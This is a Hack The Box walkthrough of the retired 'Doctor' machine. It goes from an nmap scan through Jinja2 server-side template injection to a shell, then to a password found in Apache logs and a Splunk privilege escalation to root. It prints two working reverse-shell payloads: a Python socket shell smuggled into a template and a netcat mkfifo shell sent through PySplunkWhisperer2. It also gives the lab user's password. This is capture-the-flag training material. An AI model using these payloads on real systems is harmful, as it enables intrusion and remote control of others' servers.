Introduction@Doctor:~$
Column | Details |
---|---|
Name | Doctor |
IP | 10.10.10.209 |
Points | 20 |
Os | Linux |
Difficulty | Easy |
Creator | egotisticalSW |
Out On | 26 Sept 2020 |
Summary
-
Nmap
shows the 3 Ports open. -
Getting the subdomain
doctors.htb
on the web server. - Ananlyzing the Server sided template injection
-
Got shell as
web
-
Found Password of shaun
in
apache2 logs
-
Geeting the exploit of
Splunk
-
Got shell as
root
- Getting
root.txt
Pwned
Recon
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌─[root@d3dsec]─[~/Desktop/HTB/Doctor]
└──╼ #cat nmap/result.nmap
# Nmap 7.80 scan initiated Sun Sep 27 08:19:05 2020 as: nmap -sC -sV -oA /result 10.10.10.209
Nmap scan report for 10.10.10.209
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 27 08:20:15 2020 -- 1 IP address (1 host up) scanned in 70.71 seconds
So basically Three ports are opened 22:ssh
80:http
and 8089:https
Port-80
There is a simple web page no links are working
But we find one subdomain doctors.htb
.
Let's add this to our /etc/hosts
file.
Now let's go to doctors.htb
Hmmm , a login page. Let's Try somesql injection
But nothing is work. Lets Registers
ourself and try to login then
So its show nothing, Lets check theSource Code
This seems to be some link/archive
let's go to that page and see what's on that
Hmmm, Blank
Page
Let's, try to submit a new message
Let's, try first simple html H1
tag
It accept this html
h1 tag but were we got the response
of that.
Let's check on that /archive
page .
But still it's blank
. Let's check the source code of that page.
Our response is there. But he didn't
execute, Let's try to modify
this html tag
let's try to post this. Hope
it's work
Boom
it's work, Let's Check the source code
.
Now i Known what's to do next. this is vulnerable from Server-Side Template Injection
I Found interesting Article
Link
: Templates Injections
Let's try Jinja2
Basic injection
First, We are using {{7*'7'}}
.
If this executed successfully
so we will get the response of 7777777
Boom it's executed successfuly. Now let's use Exploit the SSTI by writing an evil config file
To Get the reverse shell.
We are using this exploit
1
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.00.0\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
Let's try to post
that
Let's go to the /archive
Page But First start a netcat lisner on 9001
port
It's reloding
, let's check our netcat
lisner.
Ahhh…We got the shell
successfuly
We are Web
.
1
2
web@doctor:~$ whoami
Web
Let's enumerate something to get Privilege escalation
hmm, We find something interesting thing in /var/log/apache2/
In the /var/log/apache2/
directory there is a file called backup. Let's check there is any password
or anything interesting in That.
Boom guys, we find password of shaun
1
Password = Guitar123
Now Let's Change
our user to shaun
.
1
2
3
4
web@doctor:~$ su shaun
Password:
shaun@doctor:~$ whoami
shaun
Privilege escalation
I run LinPEAS
And Find Something interesting
.
PySplunkWhisperer2_remote.py
After some guessing and brain farts i was able to run this PySplunkWhisperer2_remote.py
1
python PySplunkWhisperer2_remote.py --lhost 10.10.XX.XX --host 10.10.10.209 --username shaun --password Guitar123 --payload '/bin/bash -c "rm /tmp/dedsec;mkfifo /tmp/dedsec;cat /tmp/dedsec|/bin/sh -i 2>&1|nc 10.10.XX.XX 5555 >/tmp/dedsec"'
Let's check dedsec
directory is created
or not.
And we pwned it …….
If u liked the writeup.Support a Student to Get the OSCP-Cert
Donation for OSCP